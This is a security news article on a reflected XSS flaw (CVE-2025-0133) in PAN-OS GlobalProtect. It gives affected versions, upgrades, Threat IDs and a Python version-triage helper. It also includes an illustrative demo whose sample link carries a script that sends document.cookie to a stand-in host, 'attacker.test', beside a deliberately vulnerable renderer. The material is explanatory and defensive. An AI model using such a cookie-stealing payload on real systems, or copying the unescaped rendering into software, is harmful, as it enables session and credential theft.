
Palo Alto Networks has issued a security advisory for a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-0133, affecting the GlobalProtect gateway and portal components of its PAN-OS software. The flaw lets an attacker craft links that appear to be hosted on the GlobalProtect portal and, when clicked by an authenticated Captive Portal user, execute attacker-controlled JavaScript in that user's browser.
While the CVSS base score is 5.1 (Low) under default configurations, the risk increases to 6.9 (Medium) when Clientless VPN is enabled.
According to the advisory: “A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect gateway and portal features of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user’s browser when they click on a specially crafted link.”
This makes the flaw particularly concerning for phishing campaigns and credential theft scenarios, especially in environments using Clientless VPN functionality.
“The integrity impact of this vulnerability is limited to enabling an attacker to create phishing and credential-stealing links that appear to be hosted on the GlobalProtect portal,” the company added.
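The mechanism the advisory describes is the classic reflected XSS pattern: a value taken from the request URL is written back into the page without output encoding, so a link the attacker sends becomes script that runs in the victim's session. The following is an added illustration of that pattern in a generic form, not PAN-OS or GlobalProtect code; the endpoint path, the `msg` parameter and the sample link are invented for the demonstration.

```python
# Added example: a generic reflected-XSS illustration, not PAN-OS or
# GlobalProtect code. The endpoint path, the 'msg' parameter and the
# hostnames below are invented.
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed sample link of the kind a phishing e-mail would carry.
# Percent-encoded so the browser delivers it to the server unchanged;
# '+' is encoded as %2B because parse_qs would otherwise turn it into a space.
CRAFTED_LINK = (
    "https://vpn.example.test/login?msg=%3Cscript%3Edocument.location%3D"
    "%27https%3A%2F%2Fattacker.test%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def msg_param(url: str) -> str:
    """Extract the 'msg' query parameter, URL-decoded, as the server sees it."""
    return parse_qs(urlsplit(url).query).get("msg", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim into the HTML body: reflected XSS."""
    return f"<html><body><p class='notice'>{msg_param(url)}</p></body></html>"


def render_fixed(url: str) -> str:
    """Same page with HTML output encoding; the payload becomes inert text."""
    safe = escape(msg_param(url), quote=True)
    return f"<html><body><p class='notice'>{safe}</p></body></html>"


def contains_live_script(html: str) -> bool:
    """Crude comparison check: an unescaped <script> element in the body."""
    return "<script>" in html.lower()


if __name__ == "__main__":
    print(render_vulnerable(CRAFTED_LINK))
    print(render_fixed(CRAFTED_LINK))
```

The vulnerable rendering emits the decoded `<script>` element, which a browser would execute with the session cookies and origin of the portal; the fixed rendering turns `<`, `>` and the quote characters into entities, so the same link displays the payload as text. This is why the advisory's impact statement is about credential-stealing links that appear to come from the portal rather than about the server itself.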
This vulnerability is specifically applicable to “PAN-OS firewall configurations with an enabled GlobalProtect gateway or portal”. The following PAN-OS versions are affected:
- Cloud NGFW: All versions
- PAN-OS 11.2: Versions prior to 11.2.7
- PAN-OS 11.1: Versions prior to 11.1.11
- PAN-OS 10.2: Versions prior to 10.2.17
- PAN-OS 10.1: All versions
It’s important to note that Prisma Access is unaffected.
At the time of the advisory, “Palo Alto Networks is not aware of any malicious exploitation of this issue”. However, proof-of-concept exploit code is available for the vulnerability.
The solution is to upgrade to unaffected PAN-OS versions:
- PAN-OS 11.2: Upgrade to 11.2.7 or later (ETA June 2025)
- PAN-OS 11.1: Upgrade to 11.1.11 or later (ETA July 2025)
- PAN-OS 10.2: Upgrade to 10.2.17 or later (ETA August 2025)
- PAN-OS 10.1: No fixed 10.1 release is listed; the advised path is to upgrade to 10.2.17 or later (ETA August 2025). Keep in mind that PAN-OS 10.1 is in Limited Support and reaches software end-of-life in August 2025.
- For all other unsupported PAN-OS versions, upgrading to a supported fixed version is recommended.
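A practical way to act on the version list above is to compare each firewall's reported software version against the first fixed release of its train. The following is an added example, not a Palo Alto Networks tool; the function names and the inventory rows are constructed for illustration, and it encodes only the thresholds stated in the advisory.

```python
# Added example: compares PAN-OS versions against the fixed releases listed
# for CVE-2025-0133. Not a Palo Alto Networks tool; the inventory rows and
# hostnames are constructed for this illustration.
import re
from typing import Optional

# First fixed release per supported PAN-OS train, as given in the advisory.
FIXED_VERSIONS = {
    (11, 2): (11, 2, 7),
    (11, 1): (11, 1, 11),
    (10, 2): (10, 2, 17),
}
# Trains with no fixed release of their own: every version is affected.
UNFIXED_TRAINS = {(10, 1)}

# PAN-OS versions look like '10.2.10' or '10.2.10-h12' (hotfix suffix).
_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(version: str) -> tuple:
    """Parse 'major.minor.patch' with an optional '-hN' hotfix suffix."""
    if version is None:
        raise ValueError("PAN-OS entries need a version string")
    m = _VER.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, patch, hotfix = m.groups()
    return int(major), int(minor), int(patch), int(hotfix or 0)


def is_affected(product: str, version: Optional[str] = None) -> bool:
    """True when the product/version falls in the advisory's affected list.

    Prisma Access is unaffected. Cloud NGFW is affected on all versions.
    For PAN-OS, trains with a fix compare against the first fixed release;
    10.1 has no fix, and trains the advisory does not list (e.g. 11.0, 9.1)
    are unsupported, so both are flagged, matching the advice to move to a
    supported fixed version.
    """
    if product == "Prisma Access":
        return False
    if product == "Cloud NGFW":
        return True
    if product != "PAN-OS":
        raise ValueError(f"unknown product: {product!r}")
    major, minor, patch, _hotfix = parse_panos_version(version)
    train = (major, minor)
    if train in UNFIXED_TRAINS:
        return True
    fixed = FIXED_VERSIONS.get(train)
    if fixed is None:
        return True  # unsupported train: flag it conservatively
    # A hotfix of the fixed patch level (e.g. 10.2.17-h1) is already fixed.
    return (major, minor, patch) < fixed


def triage(inventory):
    """Return the (hostname, product, version) rows that still need action."""
    return [row for row in inventory if is_affected(row[1], row[2])]


# Constructed sample inventory for a stand-alone run.
SAMPLE_INVENTORY = [
    ("fw-edge-1", "PAN-OS", "11.2.6"),
    ("fw-edge-2", "PAN-OS", "11.2.7"),
    ("fw-dc-1", "PAN-OS", "10.2.17-h1"),
    ("fw-legacy", "PAN-OS", "10.1.14-h9"),
    ("fw-old", "PAN-OS", "11.0.4"),
    ("cloud-ngfw-west", "Cloud NGFW", None),
    ("prisma-access", "Prisma Access", None),
]

if __name__ == "__main__":
    for hostname, product, version in triage(SAMPLE_INVENTORY):
        print(f"{hostname}: {product} {version or ''} needs upgrade".rstrip())
```

On a firewall the `sw-version` line of `show system info` is the input this check expects. The check only tells you whether the software is at a fixed release; it does not confirm that a GlobalProtect gateway or portal is actually enabled, which is the configuration the advisory scopes the flaw to.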
For customers with a Threat Prevention subscription, a significant mitigation is available. “Threat ID 510003 and 510004 (introduced in Applications and Threats content version 8970)” can block attacks for this vulnerability. These Threat IDs are already “enabled on Prisma Access, which blocks the attack”.
Additionally, disabling Clientless VPN is a viable workaround that brings the severity back down to the 5.1 (Low) base case; it reduces the exposure but does not remove the vulnerability, so upgrading remains the fix. For comprehensive details, Palo Alto Networks advises reviewing the security advisory PAN-SA-2025-0005.